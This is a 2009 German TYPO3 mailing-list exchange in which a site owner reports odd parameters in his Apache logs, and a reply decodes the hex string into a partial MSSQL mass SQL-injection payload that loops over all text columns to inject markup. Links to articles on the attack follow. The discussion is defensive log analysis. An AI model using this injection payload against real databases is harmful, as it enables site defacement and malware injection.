[TYPO3-german] Wie stelle ich "zuverlässig" fest, ob meine TYPO3-Installation gehacked wurde?
David Bruchmann
david at bruchmann-web.de
Mon Mar 9 23:38:19 CET 2009
----- Ursprüngliche Nachricht -----
Von: David Bruchmann <david at bruchmann-web.de>
Gesendet: Montag, 9. März 2009 23:11:05
An: uwe.jakobs at imageco.de, German TYPO3 Userlist
<typo3-german at lists.netfielders.de>
CC:
Betreff: Re: [TYPO3-german] Wie stelle ich "zuverlässig" fest, ob
meine TYPO3-Installation gehacked wurde?
>
> ----- Ursprüngliche Nachricht -----
> Von: Uwe Jakobs ImageCode® <uwe.jakobs at imageco.de>
> Gesendet: Montag, 9. März 2009 20:55:42
> An: 'German TYPO3 Userlist' <typo3-german at lists.netfielders.de>
> CC:
> Betreff: Re: [TYPO3-german] Wie stelle ich "zuverlässig" fest, ob
> meine TYPO3-Installation gehacked wurde?
>
> Hallo Uwe,
>
>> ich hoffe, meine Anfrage entwickelt sich zum Off-Topic, aber ich habe in der
>> vergangenen Zeit im access-log meines Apache2 überraschend viele
>> Parameter-Anhängsel wie dieses hier entdeckt:
>>
>> 3BSET%20%40S%3DCAST(0x4445434C415245204054207661726368617228323535292C404320
>> 76617263686172283430303029204445434C415245205461626C655F437572736F7220435552
>> 534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F
>> 626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
>> 616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78
>> 747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729
>> 204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461
>> 626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354
>> 415455533D302920424547494E20657865632827757064617465205B272B40542B275D207365
>> 74205B272B40432B275D3D2727223E3C2F74
>>
>
> ich weiss zwar nicht was das für ein Codeschnipsel ist, aber übersetzt
> heißt es:
>
> ;SET @S=CAST(DECLARE @T varchar(255), at C varchar(4000) DECLARE
> Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,
> syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or
> b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT
> FROM Table_Cursor INTO @T, at C WHILE (@@FETCH_STATUS=0) BEGIN exec('update
> ['+ at T+'] set ['+ at C+']=''"></t
>
> Viele Grüße
> David
... und hier sind einige Kommentare dazu:
http://www.lexa.ru/security-alerts/msg01435.html
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html
Viele Grüße
David
More information about the TYPO3-german
mailing list